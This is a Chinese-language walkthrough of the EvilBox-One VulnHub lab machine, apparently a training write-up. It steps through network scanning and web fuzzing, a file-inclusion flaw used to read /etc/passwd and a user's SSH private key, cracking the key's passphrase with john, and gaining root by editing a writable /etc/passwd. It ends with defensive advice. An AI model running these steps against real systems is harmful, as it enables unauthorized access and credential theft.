一起来打靶:Evil-Box靶场实战详解
字数 1177 2025-08-12 11:33:35
Evil-Box靶场实战教学文档
一、靶机概述
- 靶机名称: EvilBox-One
- 难度等级: 低→中
- 目标: 取得root权限 + 获取2个Flag
- 下载地址: https://download.vulnhub.com/evilbox/EvilBox---One.ova
- 特点: 边界突破和提权方法新颖,适合初学者学习渗透思路
二、环境配置
- 将Kali和靶机镜像放置同一网段
- 确保网络连通性
三、使用工具介绍
3.1 fping
用于多主机同时ping检测,比传统ping更高效
常用参数:
-a: 显示存活的主机-g: 通过指定开始和结束地址生成目标列表-u: 显示不可到达的目标
3.2 Gobuster
高效的目录扫描工具,支持多种模式
模式:
dir: 经典目录暴力破解dns: DNS子域暴力破解vhost: 虚拟主机暴力破解s3: S3存储桶枚举
常用命令:
gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,html,asp,txt
3.3 FFuf
Go语言编写的高速Web Fuzzer,速度快且功能强大
用途:
- 目录发现
- 子域名发现
- HTTP方法模糊测试
四、渗透测试流程
4.1 主机发现
fping -gaq 192.168.147.0/24
4.2 网络扫描
nmap 192.168.147.134
sudo nmap -p22,80 -sV -sS 192.168.147.134
4.3 Web目录探测
gobuster dir -u http://192.168.147.134/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
发现:
/robots.txt: 显示"Hello H4x0r"(潜在用户名线索)/secret/: 空白页面/secret/evil.php: 空白页面
4.4 参数爆破
使用FFuf进行参数爆破:
- 第一次尝试:
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PARAM -w kkboss.txt:kk -u http://192.168.147.134/secret/evil.php?PARAM=kk -fs 0
- 第二次尝试(修改参数值):
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.147.134/secret/evil.php?FUZZ=../index.html -fs 0
发现: command参数存在文件包含漏洞
4.5 文件包含利用
http://192.168.147.134/secret/evil.php?command=etc/passwd
发现: 用户mowree
尝试远程文件包含和写入webshell失败后,转向SSH相关文件读取
4.6 SSH相关文件读取
- 读取authorized_keys:
/secret/evil.php?command=home/mowree/.ssh/authorized_keys
- 读取私钥:
/secret/evil.php?command=home/mowree/.ssh/id_rsa
4.7 SSH公钥登录
- 保存私钥并设置权限:
vi id_rsa
chmod 600 id_rsa
- 尝试登录:
ssh mowree@192.168.147.134 -i id_rsa
- 离线破解私钥密码:
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
cd /usr/share/john
./ssh2john.py ~/id_rsa > ~/kk
cd
john kk --wordlist=rockyou.txt
发现: 私钥密码为unicorn,获取Flag-1
4.8 权限提升
- 信息收集:
crontab -l
sudo -l
uname -a
find / -perm /4000 2>/dev/null
find / -perm /2000 2>/dev/null
find / -writable 2>/dev/null
find / -writable 2>/dev/null | grep -v proc
发现: /etc/passwd可写
- 修改root密码:
openssl passwd -1
vi /etc/passwd
- 切换root用户:
su
cd /root
获取Flag-2
五、关键知识点总结
- 主机发现技巧: 使用fping快速扫描存活主机
- 目录爆破: Gobuster的高效使用
- 参数爆破: FFuf工具的使用方法
- 文件包含漏洞: 利用文件包含读取系统敏感文件
- SSH私钥利用: 获取和破解SSH私钥的方法
- 权限提升: 通过可写的/etc/passwd文件直接修改root密码
- 信息收集: 系统权限、SUID文件、可写文件等关键检查点
六、防御建议
- 限制敏感文件权限(如/etc/passwd)
- 禁用不必要的文件包含功能
- 加强SSH密钥管理
- 定期检查系统可写文件
- 最小化Web服务器目录暴露
- 对用户输入进行严格过滤